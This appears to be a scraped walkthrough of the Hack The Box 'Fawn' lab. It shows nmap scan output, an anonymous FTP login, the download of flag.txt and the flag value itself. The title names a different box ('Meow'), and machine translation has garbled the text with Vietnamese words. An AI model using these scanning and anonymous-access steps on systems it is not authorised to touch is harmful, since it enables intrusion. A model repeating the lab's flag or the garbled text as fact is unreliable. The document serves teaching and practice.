Solving HTB Meow CTF: A Step-by-Step Guide | System Weakness

  • 3,000
  • Tác giả: admin
  • Ngày đăng:
  • Lượt xem: 3
  • Tình trạng: Còn hàng

Welcome lớn our comprehensive guide on solving the HTB Fawn challenge. Join us as we delve into FTP acronyms, ports, scanning techniques, and ultimately obtain the coveted root flag. Get ready lớn sharpen your cyber security skills!

What does the 3-letter acronym FTP stand for?

File Transfer Protocol

FTP stands for File Transfer Protocol. It is a standard network protocol used for transferring files between a client and a server on a computer network.

Which port does the FTP service listen on usually?

21

The FTP service typically listens on port 21. This port is reserved for FTP communication.

What acronym is used for the secure version of FTP?

sftp

The secure version of FTP is known as SFTP, which stands for Secure File Transfer Protocol. SFTP provides encryption and secure authentication for tệp tin transfers.

What is the command we can use lớn send an ICMP echo request lớn test our connection lớn the target?

ping

The command lớn send an ICMP echo request, commonly known as a ping, is ping .

From your scans, what version is FTP running on the target?

# nmap -sV 10.129.16.241
Starting Nmap 7.94 ( ) at 2023-06-28 13:03 +03
Nmap scan report for 10.129.16.241
Host is up (0.19s latency).
Not shown: 999 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 2.57 seconds

To determine the version of FTP running on the target, you can use network scanning tools lượt thích Nmap. By running the command nmap -sV you can gather information about open ports and their associated services. Look for the FTP service in the scan results, and it should display the version. For example, “vsftpd 3.0.3" indicates that FTP version 3.0.3 is running on the target.

From your scans, what OS type is running on the target?

Service Info: OS: Unix

When analyzing the scan results from Nmap or similar tools, look for the “Service Info” section. In this case, it states “OS: Unix,” indicating that the target is running a Unix-based operating system.

What is the command we need lớn lập cập in order lớn display the ‘ftp’ client help menu?

ftp -h

To display the help thực đơn for the ‘ftp’ client, you can lập cập the command ftp -h.

What is username that is used over FTP when you want lớn log in without having an account?

# ftp 10.129.16.241
Connected lớn 10.129.16.241.
220 (vsFTPd 3.0.3)
Name (10.129.16.241:kami): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode lớn transfer files.
ftp>

When connecting lớn an FTP server without having an tài khoản, you can use the username “anonymous”.

What is the response code we get for the FTP message ‘Login successful’?

230 Login successful.

The response code for the FTP message ‘Login successful’ is “230”.

There are a couple of commands we can use lớn list the files and directories available on the FTP server. One is dir. What is the other that is a common way lớn list files on a Linux system.

ftp> ls
229 Entering Extended Passive Mode (|||57579|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.
ftp> ls -al
229 Entering Extended Passive Mode (|||28843|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 121 4096 Jun 04 2021 .
drwxr-xr-x 2 0 121 4096 Jun 04 2021 ..
-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt
226 Directory send OK.

In addition lớn the dircommand, a common way lớn list files on a Linux system is lớn use the ls command.

What is the command used lớn tải về the tệp tin we found on the FTP server?

ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||47631|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |****************************| 32 0.55 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.10 KiB/s)
ftp>

Use the getcommand lớn get a tệp tin from the FTP server. For instance, you might use the command get flag.txt lớn tải về a tệp tin named “flag.txt” lớn your local system if you discovered it on the server.

Submit root flag

cat flag.txt                              
035db21c881520061c53e0536e44f815

After successfully downloading the tệp tin “flag.txt,” you can view its contents using the command cat flag.txt. The nội dung of the root flag should be displayed, allowing you lớn submit it for verification.

In this article, we covered the step-by-step process of solving the HTB Fawn CTF challenge. We explored various aspects, including FTP acronyms, port numbers, version identification, OS type, commands for FTP interactions, and downloading and submitting the root flag. By following these instructions, you should be able lớn successfully complete the challenge and enhance your skills in the field of cyber security and CTFs. Happy hacking!